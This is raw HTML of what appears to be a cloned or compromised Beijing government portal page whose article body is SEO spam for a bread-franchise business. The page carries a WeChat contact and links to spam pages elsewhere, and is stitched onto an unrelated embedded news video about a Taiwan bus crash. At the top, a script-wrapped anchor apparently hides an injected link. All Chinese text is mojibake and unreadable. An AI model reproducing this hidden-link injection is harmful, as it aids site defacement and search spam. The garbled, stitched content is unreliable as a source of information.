<a class="z7z8z9z6" href="http://www.yeyelupic.info/">http://www.yeyelupic.info/</a>
<script>document.write ('</' + 'di' + 'v c' + 'l' + 'ass=' + '"' + 'z7z' + '8z9z' + '6' + '"' + '>');</script>
<!-------!><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible"content="IE=9; IE=8; IE=7; IE=EDGE">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="deSCripTion" content="ѰζÁµÅàѵ×ܲ¿ÔÚÄÄ¡ú΢_ÐÅ:w4280920 <a href="http://www.tangpaishousibao.cn">Çëµã»÷ÊÖËºÃæ°ü¼ÓÃ˹ÙÍø</a>:ÊÖËºÃæ°ü²ÉÓÃ16µÀ¹¤ÐòÖÆ³ÉÇúÇúÕÛÕ۵Ľð±ß£¬²ã²ãµþµþµÄ±íƤ£¬Å¨Å¨ÓôÓôµÄÄÌÏ㣬ÃàÃàÈíÈíµÄ¿Ú¸Ð£¬ÏãÌð¿É¿Ú¡£Ëü²»½öÄÚ²¿×éÖ¯¾¢µÀ£¬¿ÉÒÔÀË¿£¬¶øÇÒÈë¿ÚÈáÈíÏãÌð£¬Ê³ºó»ØÎ¶ÎÞÇ´¿ÌìÈ»½ÍÖÖ·¢½Í£¬¸ü¼ÓÂÌÉ«½¡¿µ¡£" />
<title>ѰζÁµÅàѵ×ܲ¿ÔÚÄÄ_°Ù¶È_ ¼ÓÃË _ Åàѵ_ !???</title>
<!--ÈÈÁ¦Í¼¿ªÊ¼-->
<meta name="uctk" content="enabled">
<!--ÈÈÁ¦Í¼½áÊø-->
<meta name="keywords" content="ѰζÁµÅàѵ×ܲ¿ÔÚÄÄ"/>
<meta name="deSCripTion" content="¡ú΢_ÐÅ:w4280920 <a href="http://www.tangpaishousibao.cn">Çëµã»÷ÊÖËºÃæ°ü¼ÓÃ˹ÙÍø</a>:ÊÖËºÃæ°ü²ÉÓÃ16µÀ¹¤ÐòÖÆ³ÉÇúÇúÕÛÕ۵Ľð±ß£¬²ã²ãµþµþµÄ±íƤ£¬Å¨Å¨ÓôÓôµÄÄÌÏ㣬ÃàÃàÈíÈíµÄ¿Ú¸Ð£¬ÏãÌð¿É¿Ú¡£Ëü²»½öÄÚ²¿×éÖ¯¾¢µÀ£¬¿ÉÒÔÀË¿£¬¶øÇÒÈë¿ÚÈáÈíÏãÌð£¬Ê³ºó»ØÎ¶ÎÞÇ´¿ÌìÈ»½ÍÖÖ·¢½Í£¬¸ü¼ÓÂÌÉ«½¡¿µ¡£"/>
<meta name="sitename" content="Ê×¶¼Ö®´°-±±¾©ÊÐÕþÎñÃÅ»§ÍøÕ¾">
<meta name="siteurl" content="http://www.beijing.gov.cn">
<meta name="district" content="±±¾©" >
<meta name="filetype" content="0">
<meta name="publishedtype" content="1">
<meta name="pagetype" content="2">
<meta name="subject" content="28428;1">
<!-- Le styles -->
<link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap150609.css" rel="stylesheet">
<link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap-responsive150609.css" rel="stylesheet">
<style>
body {
background:#E8E8E8; /* 60px to make the container go all the way to the bottom of the topbar */
}
.navbar .btn-navbar { position:absolute; right:0; margin-top:50px;}
#othermessage p {width:50%;}
#othermessage dl { width:50%;}
#breadcrumbnav ul { width:100%;}
#breadcrumbnav ul li { line-height:14px; font-family:"ËÎÌå"; padding:0px 10px; margin:0; background:none; }
#othermessage span { padding:0px 10px;}
#footer { margin:20px -20px 0px -20px;}
.navbar .nav li a { font-family:"Microsoft YaHei";}
#div_zhengwen { font-family:"SimSun";}
#div_zhengwen p{ font-family:"SimSun"; padding:0;}
select { width:75px; float:left; height:35px;}
.search .input{ border:1px solid #c1c1c1; width:290px;}
.bdsharebuttonbox { float:left; width:80%;}
.navbar .nav li a { padding: 10px 48px 11px 49px;}
.nav_weather span { float:right;}
#footer { position:absolute; left:0; right:0; margin:20px 0 0 0;}
#essaybottom {font-family:"simsun"; }
#pic { text-align:center; }
#pic ul { padding-top:10px; display:none; }
#pic li {font-family:"SimSun";}
.content_text h1 {line-height:150%;}
.version { float:right; padding:48px 50px 0 0}
.search { padding: 50px 0 0 70px;}
.nav_weather a { font-family:simsun;}
.version li a { font-family:simsun;}
.footer-class { font-family:simsun;}
@media only screen and (max-width: 480px)
{
#pic img { width:100%;}
}
@media only screen and (max-width: 320px)
{
#pic img { width:100%;}
}
@media only screen and (max-width: 640px)
{
#pic img { width:100%;}
}
#filerider .filelink {font-family:"SimSun";}
#filerider .filelink a:link { color:#0000ff; font-family:"SimSun";}
</style>
<SCripT type="text/javaSCripT">
var pageName = "t1424135";
var pageExt = "htm";
var pageIndex = 0 + 1;
var pageCount = 1;
function getCurrentPage() {
document.write(pageIndex);
}
function generatePageList() {
for (i=0;i<1;i++) {
var curPage = i+1;
document.write('<option value=' + curPage);
if (curPage == pageIndex)
document.write(' selected');
document.write('>' + curPage + '</option>');
}
}
function preVious(n) {
if (pageIndex == 1) {
alert('ÒѾÊÇÊ×Ò³£¡');
} else {
getPageLocation(pageIndex-1);
}
}
function next(n) {
if (pageIndex == pageCount) {
alert('ÒѾÊÇβҳ£¡');
} else {
nextPage(pageIndex);
}
}
function nextPage(page) {
var gotoPage = "";
if (page == 0) {
gotoPage = pageName + "." + pageExt;
} else {
gotoPage = pageName + "_" + page + "." + pageExt;
}
location.href = gotoPage;
}
function getPageLocation(page) {
var gotoPage = "";
var tpage;
if (page == 1) {
gotoPage = pageName + "." + pageExt;
} else {
tpage=page-1;
gotoPage = pageName + "_" + tpage + "." + pageExt;
}
location.href = gotoPage;
}
</SCripT>
<SCRIPT type=text/javaSCripT>
function $(xixi) {
return document.getElementById(xixi);
}
//ת»»×ÖºÅ
function doZoom(size){
if(size==12){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "";
$("fs14").style.display = "none";
$("fs16").style.display = "none";
}
if(size==14){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "none";
$("fs14").style.display = "";
$("fs16").style.display = "none";
}
if(size==16){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "none";
$("fs14").style.display = "none";
$("fs16").style.display = "";
}
}
</SCRIPT>
<!-- Le HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<SCripT src="//html5shim.googlecode.com/svn/trunk/html5.js"></SCripT>
<![endif]-->
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="images/favicon.ico">
<link rel="apple-touch-icon" href="images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="72x72" href="images/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="114x114" href="images/apple-touch-icon-114x114.png">
<SCripT type="text/javaSCripT">
window.onload = function(){
var picurl = [
"",
"",
"",
"",
"",
"",
"",
"",
"",
""
];
var i=0;
for(i=0;i<picurl.length;i++)
{
picurl[i].index=i;
if(picurl[i]!="")
{
document.getElementById("pic_"+i).style.display = "block";
}
}
}
</SCripT>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="nav_weather">
<div class="container"><a href="http://zhengwu.beijing.gov.cn/sld/swld/swsj/t1232150.htm" title="ÊÐί" target="_blank">ÊÐί</a> | <a href="http://www.bjrd.gov.cn/" title="ÊÐÈË´ó" target="_blank">ÊÐÈË´ó</a> | <a href="http://www.beijing.gov.cn/" title="ÊÐÕþ¸®" target="_blank">ÊÐÕþ¸®</a> | <a href="http://www.bjzx.gov.cn/" title="ÊÐÕþÐ" target="_blank">ÊÐÕþÐ</a></div>
</div>
<div class="container">
<a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</a>
<div class="span12">
<a class="brand" href="http://www.beijing.gov.cn/"><img src="http://www.beijing.gov.cn/images/zhuanti/xysym/logo.png" /></a>
<div class="search">
<SCripT language="JavaScript" type="text/javaSCripT">
function checkForm(){
var temp = searchForm.temp.value;
var database = searchForm.database.value;
if(temp==null || temp==""){
alert("ÇëÊäÈëËÑË÷Ìõ¼þ");
}
else{
var url="http://so.beijing.gov.cn/Query?qt="+encodeURIComponent(temp)+"&database="+encodeURIComponent(database);
window.open(url);
}
return false;
}
</SCripT>
<form id="search" method="get" name="searchForm" action="" target="_blank" onSubmit="return checkForm()">
<input type="hidden" value="bj" id="database" name="database" />
<input name="temp" id="keyword" type="text" value="È«ÎÄËÑË÷" class="input" title="È«ÎÄËÑË÷¹Ø¼ü×Ö" />
<input id="searchbutton" type="image" src="http://www.beijing.gov.cn/images/zhuanti/xysym/search_btn.gif" width="66" height="35" title="µã»÷ËÑË÷" alt="ËÑË÷" />
</form>
</div>
<div class="version"><ul>
<li><a title="ÎÞÕϰ" href="http://wza.beijing.gov.cn/" target="_blank" id="yx_style_nav">ÎÞÕϰ</a></li>
<li><a target="_blank" title="·±Ìå°æ" href="http://210.75.193.158/gate/big5/www.beijing.gov.cn">·±Ìå</a></li>
<li><a target="_blank" title="¼òÌå°æ" href="http://www.beijing.gov.cn">¼òÌå</a></li>
<li class="last"><a target="_blank" title="English Version" href="http://www.ebeijing.gov.cn">English</a></li></ul><ul>
<li><a href="javaSCripT:void(0)" onclick="SetHome(this,window.location)" title="ÉèΪÊ×Ò³">ÉèΪÊ×Ò³</a></li>
<li><a title="¼ÓÈëÊÕ²Ø" href="javaSCripT:void(0)" onclick="shoucang(document.title,window.location)">¼ÓÈëÊÕ²Ø</a></li>
<li class="last"><a target="_blank" title="ÒÆ¶¯°æ" href="http://www.beijing.gov.cn/sjbsy/">ÒÆ¶¯°æ</a></li></ul></div>
</div>
</div>
<div class="nav-collapse">
<div class="container">
<ul class="nav">
<li ><a href="http://www.beijing.gov.cn/" class="normal" title="Ê×Ò³">Ê×Ò³</a></li>
<li><a href="http://zhengwu.beijing.gov.cn/" class="normal" title="ÕþÎñÐÅÏ¢">ÕþÎñÐÅÏ¢</a></li>
<li><a href="http://www.beijing.gov.cn/sqmy/default.htm" class="normal" title="ÉçÇéÃñÒâ">ÉçÇéÃñÒâ</a></li>
<li><a href="http://banshi.beijing.gov.cn" class="normal" title="ÕþÎñ·þÎñ">ÕþÎñ·þÎñ</a></li>
<li><a href="http://www.beijing.gov.cn/bmfw" class="normal" title="±ãÃñ·þÎñ">±ãÃñ·þÎñ</a></li>
<li style="background:none;"><a href="http://www.beijing.gov.cn/rwbj/default.htm" class="normal" title="ÈËÎı±¾©">ÈËÎı±¾©</a></li>
</ul>
</div>
</div><!--/.nav-collapse -->
</div>
</div>
</div>
<div class="container" style="background:#fff; margin-top:24px;">
<div class="content_text">
<div id="breadcrumbnav">
<ul>
<li>Ê×Ò³¡¡>¡¡±ãÃñ·þÎñ¡¡>¡¡×îÐÂÌáʾ</li>
</ul>
<div class="clearboth"></div>
</div>
<h1>ѰζÁµÅàѵ×ܲ¿ÔÚÄÄ
<div id="othermessage">
<p>
<span>À´Ô´£º±±¾©ÈÕ±¨</span>
<span>ÈÕÆÚ£º2017-03-09 11:52:17</span></p>
<dl>
<SCripT language='JavaScript' type="text/javaSCripT">
function changeSize(size){document.getElementById('div_zhengwen').style.fontSize=size+'px'}</SCripT>
¡¾×ֺŠ<a href='javaSCripT:changeSize(18)' style="font-size:16px;">´ó</a> <a href='javaSCripT:changeSize(14)' style="font-size:14px;">ÖÐ</a> <a href='javaSCripT:changeSize(12)' style="font-size:12px;">С</a>¡¿</dl>
</div>
</h1>
<div id="div_zhengwen">
<div id="pic">
<ul id="pic_0">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_1">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_2">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_3">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_4">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_5">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_6">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_7">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_8">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_9">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
</div>
<div class=TRS_Editor><p align="justify">¡¡¡¡Ñ°Î¶ÁµÅàѵ×ܲ¿ÔÚÄÄ ¡ú΢_ÐÅ:w4280920 <a href="http://www.tangpaishousibao.cn">Çëµã»÷ÊÖËºÃæ°ü¼ÓÃ˹ÙÍø</a>:ÊÖËºÃæ°ü²ÉÓÃ16µÀ¹¤ÐòÖÆ³ÉÇúÇúÕÛÕ۵Ľð±ß£¬²ã²ãµþµþµÄ±íƤ£¬Å¨Å¨ÓôÓôµÄÄÌÏ㣬ÃàÃàÈíÈíµÄ¿Ú¸Ð£¬ÏãÌð¿É¿Ú¡£Ëü²»½öÄÚ²¿×éÖ¯¾¢µÀ£¬¿ÉÒÔÀË¿£¬¶øÇÒÈë¿ÚÈáÈíÏãÌð£¬Ê³ºó»ØÎ¶ÎÞÇ´¿ÌìÈ»½ÍÖÖ·¢½Í£¬¸ü¼ÓÂÌÉ«½¡¿µ¡£</p>
<img src="{img}" width="300" height="330"/>
<p align="justify">¡¡¡¡
<link rel="stylesheet" href="http://ent.sina.com.cn/css/470/20120928/style_videolist.css" charset="GBK" />
<div class="artical-player-wrap" style="display:block;">
<div class="a-p-hd">
<div id="J_Article_Player">
ÊÓÆµ¼ÓÔØÖУ¬ÇëÉÔºò...
</div>
<div class="a-p-info">
<label class="fl autoplayctrl" suda-uatrack="key=videoq&value=autoplay" style="display:none;">
<input type="checkbox" checked id="J_Video_Autoplay" />
×Ô¶¯²¥·Å
</label>
<span id="J_Video_Source"> </span>
</div>
</div>
<div class="a-p-bd a-p-bd-b" id="J_Play_List_Wrap" style="display:none;">
<div class="a-p-slide">
<div class="a-p-s-list clearfix" id="J_Play_List">
<div class="a-p-s-item J_Play_Item" play-data="250995978-1-1" url-data="http://video.sina.com.cn/p/news/o/doc/2017-02-13/230265699059.html" title-data="̨Íå·¢ÉúÓÎÀÀ³µ·³µÊÂ¹Ê ÏÖ³¡Ò»Æ¬Àǽå" source-data="">
<a href="javaSCripT:;" class="a-p-s-img" hidefocus="true" title="̨Íå·¢ÉúÓÎÀÀ³µ·³µÊÂ¹Ê ÏÖ³¡Ò»Æ¬Àǽå" >
<img width="120" height="90" src="" alt="̨Íå·¢ÉúÓÎÀÀ³µ·³µÊÂ¹Ê ÏÖ³¡Ò»Æ¬Àǽå" />
<i class="a-p-s-play">play</i>
<span class="a-p-s-txt">̨Íå·¢ÉúÓÎÀÀ³µ·³µÊÂ¹Ê ÏÖ³¡Ò»Æ¬Àǽå</span>
</a>
</div>
</div>
<a href="javaSCripT:;" class="a-p-s-prev" id="J_Player_Prev">Ïòǰ</a>
<a href="javaSCripT:;" class="a-p-s-next" id="J_Player_Next">Ïòºó</a>
</div>
</div>
<SCripT type="text/javaSCripT" charset="GBK" src="http://www.sinaimg.cn/ty/sinaui/scrollpic/scrollpic2012070701.min.js"></SCripT>
<SCripT type="text/javaSCripT" src="http://www.sinaimg.cn/dy/js/jquery/jquery-1.7.2.min.js"></SCripT>
<SCripT type="text/javaSCripT" charset="GBK" src="http://news.sina.com.cn/js/792/2015-03-13/149/videolist-2.js"></SCripT>
<SCripT type="text/javaSCripT">
/*×Ô¶¯²¥·Å1*/
//var AUTOPLAY = 1;
var AUTOPLAY = 0; //2015.11.25ÈÕ֪ͨ¸Ä³É0
/*Á¬²¥1*/
var CONTIPLAY = 1;
/*´¦Àí×Ô¶¯²¥·ÅÑ¡ÏîºÍcookie*/
(function() {
var Tool = CommonTool;
var chk = Tool.byId('J_Video_Autoplay');
var ua = navigator.userAgent.toLowerCase();
var isIOS = /\((iPhone|iPad|iPod)/i.test(ua);
if (isIOS) {
console.log(chk.parentNode.style.display);
//chk.parentNode.style.display = 'none'; //2015.11.25 Òþ²Ø×Ô¶¯²¥·ÅÑ¡Ïî
return;
}
//chk.parentNode.style.display = ''; //2015.11.25 Òþ²Ø×Ô¶¯²¥·ÅÑ¡Ïî
var clickCookie = function() {
Tool.bindEvent(chk, 'change',
function() {
var chked = chk.checked;
Tool.writeCookie('ArtiVAuto', (chked ? 1 : 0), 24 * 365 * 10, '/', '.sina.com.cn');
});
}
var byCookie = function() {
var coo = Tool.readCookie('ArtiVAuto');
if (coo) {
if (parseInt(coo) == 0) {
chk.checked = false;
AUTOPLAY = 0;
}
}
};
clickCookie();
byCookie();
})();
/*»ñÈ¡µÚÒ»¸öÊÓÆµvid*/
var firstItem = CommonTool.byClass('J_Play_Item', 'J_Play_List')[0];
var fInfo = firstItem.getAttribute('play-data').split('-');
var fVid = fInfo[0];
var fPid = fInfo[1];
var sinaBokePlayerConfig_o = {
container: "J_Article_Player", //DivÈÝÆ÷µÄid
width: 525,
height: 430,
playerWidth: 525, //¿í
playerHeight: 430, //¸ß
autoLoad: 1, //×Ô¶¯¼ÓÔØ
autoPlay: AUTOPLAY, //×Ô¶¯²¥·Å
as: 0, //¹ã¸æ
pid: fPid,
tjAD: 0, //ÏÔÊ¾ÇæÌìÖù¹ã¸æ
tj: 0, //Æ¬Î²ÍÆ¼ö
continuePlayer: 1, //Á¬Ðø²¥·Å
casualPlay: 1, //ÈÎÒâÍ϶¯ÊÓÆµ
head: 0, //²¥·ÅƬͷ¶¯»
logo: 0, //ÏÔʾlogo
share: 0,
thumbUrl: ""
};
</SCripT>
<SCripT src="http://sjs2.sinajs.cn/video/sinaplayer/js/page/player.js"></SCripT>
<SCripT type="text/javaSCripT">
(function() {
var toggle = function(id, hide) {
var e = CommonTool.byId(id);
var par = e.parentNode;
if (hide) {
CommonTool.addClass(par, e.className + '_disabled');
} else {
CommonTool.removeClass(par, e.className + '_disabled');
}
}
var scroll = new ScrollPic();
scroll.scrollContId = "J_Play_List"; //ÄÚÈÝÈÝÆ÷ID
scroll.arrLeftId = "J_Player_Prev"; //×ó¼ýÍ·ID
scroll.arrRightId = "J_Player_Next"; //ÓÒ¼ýÍ·ID
scroll.listEvent = "onclick"; //Çл»Ê¼þ
scroll.frameWidth = 532; //ÏÔʾ¿ò¿í¶È **ÏÔʾ¿ò¿í¶È±ØÐëÊÇ·Ò³¿í¶ÈµÄ±¶Êý
scroll.pageWidth = 133 * 3; //·Ò³¿í¶È
scroll.upright = false; //´¹Ö±¹ö¶¯
scroll.speed = 10; //ÒÆ¶¯ËÙ¶È(µ¥Î»ºÁÃ룬ԽСԽ¿ì)
scroll.space = 15; //ÿ´ÎÒÆ¶¯ÏñËØ(µ¥Î»px£¬Ô½´óÔ½¿ì)
scroll.autoPlay = false; //×Ô¶¯²¥·Å
scroll.autoPlayTime = 5; //×Ô¶¯²¥·Å¼ä¸ôʱ¼ä(Ãë)
scroll.circularly = false;
scroll._move = scroll.move;
scroll.move = function(num, quick) {
scroll._move(num, quick);
toggle(scroll.arrRightId, scroll.eof);
toggle(scroll.arrLeftId, scroll.bof);
};
scroll.initialize(); //³õʼ»¯
toggle(scroll.arrLeftId, scroll.bof);
})();
</SCripT>
<SCripT>
var autoPlayCheck = $("#J_Video_Autoplay")[0].checked;
var autoPlayFlv = 0;
var autoPlayH5 = false;
if(autoPlayCheck){
autoPlayFlv = 1;
var autoPlayH5 = true;
}
var flashConfig = {
url: "", // flash²¥·ÅÆ÷µØÖ·,
container : "J_Article_Player",
id: "myMovie",
width: 525,
height: 430,
params : {
allowNetworking : "all",
allowScriptAccess : "always",
wmode : "opaque",
allowFullScreen : "true",
quality : "high"
},
attributes: {},
flashvars: {
//autoPlay: autoPlayFlv, //ÊÇ·ñ×Ô¶¯²¥·Å
autoPlay: 0, //11.25֪ͨ¸Ä³É0
loop: 0,
autoLoad: 1,
thumbUrl: '',
tj: 0,
as: 0
},
h5attr: {
//autoPlay: autoPlayH5, //ÊÇ·ñ×Ô¶¯²¥·Å
autoPlay: false, //11.25֪ͨ¸Ä³Éfalse
controls: true, //ÊÇ·ñÏÔʾ¿ØÖÆÌõ
loop: false,
poster: '', //ÊÓÆµ¼ÓÔØÇ°Óû¼ÓÔØµÄͼƬµØÖ·£¬¼´²¥·ÅÆ÷Ò»¿ªÊ¼ÏÔʾµÄ½ØÍ¼
preload: 'auto'
}
};
var videoList = [
{
video_id: 250995978,
pid:1,
url: 'http://video.sina.com.cn/p/news/o/doc/2017-02-13/230265699059.html',
title:'̨Íå·¢ÉúÓÎÀÀ³µ·³µÊÂ¹Ê ÏÖ³¡Ò»Æ¬Àǽå'//,
//swfOutsideUrl:"http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php/video_id=250995978/s.swf"
},
]
</SCripT>
<SCripT>
(function($){
var Play = {
init: function(flashConfig, videoList){
this.flashConfig = flashConfig;
this.videoList = videoList;
this.playVideo = playVideo;
this.prev = this.current = 0;
this.length = this.videoList.length;
this.contNode = $("#J_Video_Autoplay");
this.titleNode = $("#J_Video_Source");
this.playListNode = $("#J_Play_List .J_Play_Item");
if(videoList.length!==1){
//ÏÔʾСͼ
CommonTool.byId('J_Play_List_Wrap').style.display='';
}
if(videoList.length<5){
CommonTool.byId('J_Player_Prev').style.display='none';
CommonTool.byId('J_Player_Next').style.display='none';
}
this.initPlayer();
this.bind();
},
bind: function(){
var _this = this;
$("#J_Play_List").on("click", ".J_Play_Item a", function(e){
e.preventDefault();
_this.playCurrent($(this));
});
},
initPlayer: function(){
var _this = this;
this.player = this.playVideo(this.flashConfig);
this.player.init(this.videoList[this.prev]);
this.player.on("playCompleted", function(){
_this.playNext();
});
this.playListNode.eq(0).addClass("selected");
this.titleNode.html(this.videoList[0].title);
},
playCurrent: function($this){
this.prev = this.current;
this.current = $this.parents(".J_Play_Item").index();
this.play(this.prev, this.current);
},
playNext: function(){
if(!this.contNode[0].checked){
return;
}
this.prev = this.current;
if(this.current >= this.length - 1){
return;
}
this.current++;
this.play(this.prev, this.current);
},
play: function(prev, current){
this.player.playVideo(this.videoList[current]);
this.titleNode.html(this.videoList[current].title);
this.playListNode.eq(prev).removeClass("selected");
this.playListNode.eq(current).addClass("selected");
}
}
Play.init(flashConfig, videoList);
})(jQuery);
</SCripT>
</div>
<!--Hd begin-->
<div id="HdFigure1_1_0" class="hdFigureWrap" style="margin:20px auto;"></div>
<link rel="stylesheet" href="http://news.sina.com.cn/css/87/20121218/style_hdfigure_v2.css" />
<SCripT type="text/javaSCripT" src="http://i3.sinaimg.cn/home/sinaflash.js"></SCripT>
<SCripT type="text/javaSCripT" src="http://news.sina.com.cn/js/87/content2014/hdfigure_v3.js"></SCripT>
<SCripT type="text/javaSCripT">
$(document).ready(function(){
var HdFigure1_1_0 = new HdFigure('HdFigure1_1_0', 'http://slide.news.sina.com.cn/c/slide_1_2841_107903.html');
HdFigure1_1_0.init();
});
</SCripT>
<!--Hd end-->
<!--mce-plugin-videoList2[{"listPlay":true,"videos":[{"title":"̨Íå·¢ÉúÓÎÀÀ³µ·³µÊÂ¹Ê ÏÖ³¡Ò»Æ¬Àǽå","videoid":"250995978","ad":true,"source":"","url":"http://video.sina.com.cn/p/news/o/doc/2017-02-13/230265699059.html","img":"","largeImg":"","smallImg":"","tags":"","docID":"fyamkzq1286557","vmsURL":"http://video.sina.com.cn/view/250995978.html","wapURL":"http://video.sina.cn/news/zxt/2017-02-13/detail-ifyamkzq1286557.d.html"}],"downloadDescr":"","videoCard":false}]mce-plugin-videoList2-->
<p>¡¡¡¡[̨Íå·³µÊÂ¹Ê ËÀÍöÈËÊýÉýÖÁ27ÈË]¾ÝÈËÃñÈÕ±¨ÏûÏ¢£¬Ì¨ÍåÓÎÀÀ³µ·³µÊ¹ÊÒÑÖÂ27ËÀ¡£¾ÝϤ£¬¸ÃÓÎÀÀ³µÒÑÓÐ21Äê³µÁ䣬ĿǰÎÞ·¨È·¶¨³µÁ¾ÊÇ·ñÓйÊÕÏ¡£Ä¿Ç°ÒÑÓÐÏû·À³µ¡¢¾È»¤³µµÈ¹²¼Æ40ÓàÁ¾¸Ï¸°ÏÖ³¡¡£</p>
<p>¡¡¡¡À´Ô´£ºÈËÃñÈÕ±¨</p>
</p></div>
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/dichen/2017030980.html">ÌÆÅɸâµãÊÖËºÃæ°ü¼ÓÃË</a></p>
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/dichen/2017030933.html">ѰζÏãÅɹÙÍø</a></p>
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/dichen/20170309515.html">»Æ½ðÊÖËºÃæ°üÄļÒѧζµÀÕý×Ú</a></p>
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/dichen/20170309427.html">Ïã¸ÛÊÖËºÃæ°ü³É±¾¶àÉÙ</a></p>
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/dichen/20170309252.html">¾õÎ¶ÌÆÅÉÊÖËºÃæ°ü¼ÓÃË×ܲ¿</a></p>
<div id="filerider">
<div class="filelink" style="margin:10px 0 0 0;"><a href="./P020160207382291268334.doc">¸½¼þ£º2016Äê±±¾©µØÇø²©Îï¹Ý´º½ÚϵÁлһÀÀ±í</a></div>
</div>
</div>
<div id="essaybottom" style="border:0; overflow:hidden; margin-bottom:0;">
<div style="padding-bottom:8px;" id="proclaim"><p style="float:left; line-height:30px;">·ÖÏíµ½£º</p><div class="bdsharebuttonbox"><a href="#" class="bds_more" data-cmd="more"></a><a href="#" class="bds_qzone" data-cmd="qzone"></a><a href="#" class="bds_tsina" data-cmd="tsina"></a><a href="#" class="bds_tqq" data-cmd="tqq"></a><a href="#" class="bds_renren" data-cmd="renren"></a><a href="#" class="bds_weixin" data-cmd="weixin"></a></div>
<SCripT>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdPic":"","bdStyle":"0","bdSize":"16"},"share":{},"image":{"viewList":["qzone","tsina","tqq","renren","weixin"],"viewText":"·ÖÏíµ½£º","viewSize":"16"},"selectShare":{"bdContainerClass":null,"bdSelectMiniList":["qzone","tsina","tqq","renren","weixin"]}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('SCripT')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</SCripT></div>
</div>
<div id="essaybottom" style="margin-top:0;">
<div style="padding-bottom:8px;" id="proclaim">תժÉùÃ÷£º×ªÕªÇë×¢Ã÷³ö´¦²¢×ö»ØÁ´</div>
</div>
</div>
</div>
<!-- /container -->
<div id="footer">
<div class="container">
<div class="span1" style="text-align:center"><SCripT type="text/javaSCripT">document.write(unescape("%3Cspan id='_ideConac' %3E%3C/span%3E%3CSCripT src='http://dcs.conac.cn/js/01/000/0000/60429971/CA010000000604299710004.js' type='text/javaSCripT'%3E%3C/SCripT%3E"));</SCripT></div>
<div class="span8">
<div class="footer-top">
<div class="footer-class">
<p> <a title="¹ØÓÚÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306339.htm" style=" background:0">¹ØÓÚÎÒÃÇ</a><a target="_blank" title="Õ¾µãµØÍ¼" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306342.htm">Õ¾µãµØÍ¼</a><a target="_blank" title="ÁªÏµÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306343.htm">ÁªÏµÎÒÃÇ</a><a target="_blank" title="ÆÀ¼ÛÊ×¶¼Ö®´°" href="mailto:service@beijing.gov.cn">ÆÀ¼ÛÊ×¶¼Ö®´°</a><a target="_blank" title="·¨ÂÉÉùÃ÷" href="http://www.beijing.gov.cn/zdxx/t709204.htm">·¨ÂÉÉùÃ÷</a> </p>
<p>Ö÷°ì£º±±¾©ÊÐÈËÃñÕþ¸® °æÈ¨ËùÓга죺±±¾©Êо¼ÃºÍÐÅÏ¢»¯Î¯Ô±»á ¾©ICP±¸05060933ºÅ ÔËÐйÜÀí£ºÊ×¶¼Ö®´°ÔËÐйÜÀíÖÐÐÄ</p>
<p>¾©¹«Íø°²±¸ 110105000722 µØÖ·£º±±¾©Êг¯ÑôÇø±±³½Î÷·Êý×Ö±±¾©´óÏÃÄϰ˲㠴«Õ棺84371700 ¿Í·þÖÐÐĵ绰£º59321109</p>
</div>
</div>
</div>
</div>
</div>
<div style="display:none">
<SCripT type="text/javaSCripT">document.write(unescape("%3CSCripT src='http://yhfx.beijing.gov.cn/webdig.js?z=12' type='text/javaSCripT'%3E%3C/SCripT%3E"));</SCripT>
<SCripT type="text/javaSCripT">wd_paramtracker("_wdxid=000000000000000000000000000000000000000000")</SCripT>
</div>
<SCripT src="http://static.gridsumdissector.com/js/Clients/GWD-800003-C99186/gs.js" language="JavaScript"></SCripT>
<SCripT type="text/javaSCripT">
// ÉèÖÃΪÖ÷Ò³
function SetHome(obj,vrl){
try{
obj.style.behavior='url(#default#homepage)';obj.setHomePage(vrl);
}
catch(e){
if(window.netscape) {
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
}
catch (e) {
